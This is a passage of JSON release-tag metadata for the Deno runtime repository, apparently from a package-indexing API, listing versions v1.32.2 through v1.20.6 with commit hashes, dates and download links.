/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at